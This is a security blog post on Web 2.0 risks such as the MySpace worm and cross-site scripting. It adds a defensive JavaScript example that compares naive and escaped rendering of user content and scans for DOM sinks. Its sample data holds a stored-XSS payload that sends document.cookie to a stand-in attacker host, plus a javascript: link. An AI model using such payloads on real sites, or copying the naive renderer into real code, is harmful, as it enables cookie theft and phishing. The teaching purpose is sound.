The mix of Web 2.0 functionality protected by a Web 1.0 security model is going to keep producing ugly results. From A Growing Web's Harder to Secure:
"If you take this Web 2.0 apart, part one is rich user interfaces," says Watchfire founder and CTO Michael Weider, referring to the dynamic scripts now found on many leading Web pages, using Asynchronous JavaScript (Ajax) and other fast applications. "Secondly it's the idea of community, collective intelligence and users participating."
Community creation means distributing control to end users. "So history repeats itself. If you distribute control to the users, you're opening yourself to more vulnerabilities," says another security software exec, Dave Shackleford, chief security architect at software maker Vigilar. "The ability to dynamically update code on the fly is obviously going to open itself up to the ability to inject code from malicious sources. Cross-site scripting attacks are prevalent for exactly this reason."
Exhibit A is a worm that crawled across MySpace, the pre-eminent social networking community site, just before last Christmas. It used an exploit in QuickTime video software, using embeds in an infected clip to alter the viewers' profile, which then created altered links on the profile page to dupe other users into going to phishing sites. "The idea is that they weren't targeting individual computers," says Chris Boyd, the UK-based director of malware research at FaceTime. "They were targeting the Web 2.0 services themselves. They get the same result. And there's nothing yet really to protect against it. In terms of its effect, the only way to protect yourself against this kind of thing is to not use MySpace. You can't get a bigger impact than not being able to use something."
..."You can put up nice content and bad content," Watchfire's Weider says. "The attack in a Web 2.0 situation is someone uploading nasty content and then poisoning the site for everyone else who hits on it."
...
The defenses, sources say, have to start in the development. As outlined in a recent report from Net Square founder Shreeraj Shah, the new rich interfaces with complex scripts make it difficult to identify application logic and resources buried within them. RSS feeds leading into an application surface constantly bring in data, code and information from multiple sources. This makes scanning for malicious code a real challenge. From a tech perspective, firewalls, antivirus software that searches for signature code patterns and network monitoring aren't really going to be that effective in the case of Web 2.0. Scanning is going to have to rely on technology and library fingerprinting, Shah reports.
This means mapping known vulnerabilities and clearly "printing" the Ajax and Flash libraries that create many Web 2.0 applications. It also means clearly identifying where third-party information, in the form of feeds, updates or community interaction, is coming from and having a clear understanding of which are trusted sources and which are not trustworthy, and more closely scrutinizing the "untrusted" feeds.
Access points to Document Object Model contexts (the collection of objects that represents a page in a browser, and which can be manipulated by JavaScript) need to be clearly identified and understood.
Still, just now corporate America is experimenting with Web 2.0, Weider says, in pockets of development. Now is the time to take a more basic approach than depending on software fixes and defenses later. "Developers don't think of security in the same breath that they do for adding features and shipping code on time. The biggest thing to do is to educate your organization on Web application security, period," he says.
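To make the "nasty content poisons the site for everyone else" point and the "trusted versus untrusted feeds" and "DOM access points" advice from the quoted piece concrete, here is an added example. It is not code from the article, from Watchfire or from Net Square; the profile entries, the trusted-origin list and the page script it scans are all constructed for illustration. It shows the Web 1.0 way of rendering community content (string concatenation into innerHTML, which ships the attacker's script and phishing link to every later viewer), a hardened renderer that escapes every item and applies a stricter link policy to untrusted sources, and a crude fingerprint of where a page's own script hands data to the DOM.

```javascript
// Added example, not from the quoted article. All sample data is constructed.

// Constructed profile entries as a community site might store them.
// The third one is the "nasty content" an attacker uploaded.
const PROFILE_ITEMS = [
  { source: 'https://feeds.example.com/news', text: 'Welcome to my page',
    href: 'https://feeds.example.com/news/1' },
  { source: 'https://friend.example.org', text: 'Check out my band',
    href: 'https://friend.example.org/band' },
  { source: 'https://evil.example.net',
    text: 'Free ringtones<script>document.location="https://evil.example.net/phish?c="+document.cookie</script>',
    href: 'javascript:alert(document.cookie)' },
];

// Origins the site operator has decided to trust (an assumption for this example).
const TRUSTED_ORIGINS = new Set(['https://feeds.example.com']);

// Web 1.0 rendering of Web 2.0 content: concatenate stored strings into HTML.
// Whatever the attacker stored now runs in every viewer's browser.
function renderProfileNaive(items) {
  return items.map(i => `<li><a href="${i.href}">${i.text}</a></li>`).join('\n');
}

// Escape the characters that change meaning in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Classify an item by the origin it came from, not by what it looks like.
function classifySource(source, trusted) {
  let origin;
  try { origin = new URL(source).origin; } catch (e) { return 'untrusted'; }
  return trusted.has(origin) ? 'trusted' : 'untrusted';
}

// Only http(s) links survive; javascript:, data: and unparsable hrefs are dropped.
function safeHref(href) {
  try {
    const u = new URL(href);
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
  } catch (e) { return null; }
}

// Hardened renderer: every item is escaped regardless of trust; trust only
// decides the link policy and is exposed as a data attribute for the UI.
function renderProfileSafe(items, trusted) {
  return items.map(i => {
    const trust = classifySource(i.source, trusted);
    const href = safeHref(i.href);
    const label = escapeHtml(i.text);
    const rel = trust === 'trusted' ? '' : ' rel="nofollow noopener"';
    const link = href ? `<a href="${escapeHtml(href)}"${rel}>${label}</a>` : label;
    return `<li data-source="${trust}">${link}</li>`;
  }).join('\n');
}

// Crude fingerprinting of DOM access points: string patterns through which a
// page's own script writes markup or code into the document. Constructed list.
const DOM_SINKS = ['innerHTML', 'outerHTML', 'insertAdjacentHTML', 'document.write', 'eval('];

function findDomSinks(src) {
  const hits = [];
  src.split('\n').forEach((line, n) => {
    for (const sink of DOM_SINKS) {
      if (line.includes(sink)) hits.push({ sink, line: n + 1 });
    }
  });
  return hits;
}

// Constructed page script to scan: one HTML sink, one harmless text write.
const SAMPLE_PAGE_SCRIPT = `
function showFeed(items) {
  var list = document.getElementById('feed');
  list.innerHTML = items.map(function (i) { return i.html; }).join('');
}
function showCount(n) {
  document.getElementById('count').textContent = n;
}`;

console.log('--- naive ---\n' + renderProfileNaive(PROFILE_ITEMS));
console.log('--- safe ---\n' + renderProfileSafe(PROFILE_ITEMS, TRUSTED_ORIGINS));
console.log('--- DOM sinks ---', findDomSinks(SAMPLE_PAGE_SCRIPT));
```

Run it with node. The naive output carries the stored script and the javascript: link verbatim, which is the MySpace-style outcome; the safe output renders the same attacker entry as inert text with no link at all, while the trusted feed keeps its link and the untrusted friend's link gets rel="nofollow noopener". The sink scan is deliberately a string fingerprint, not a parser: it is the kind of "library and technology fingerprinting" pass that tells you which lines of your own code deserve the closest review before any feed content reaches them.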
So let's do the math: we have rich Web 2.0 apps with rich UIs and lots of disparate data and links, and we are protecting these brand-new, 2007-built apps with a Web 1.0 security model that was invented in 1995. This would not be a bad thing at all if the attacker community had learned nothing in the last 12 years. Alas, they have already upgraded to Attacker 3.0, and can use Web 2.0 both to attack and to distribute attacks.
2.0 functionality, 1.0 security, 3.0 attackers. This cannot stand.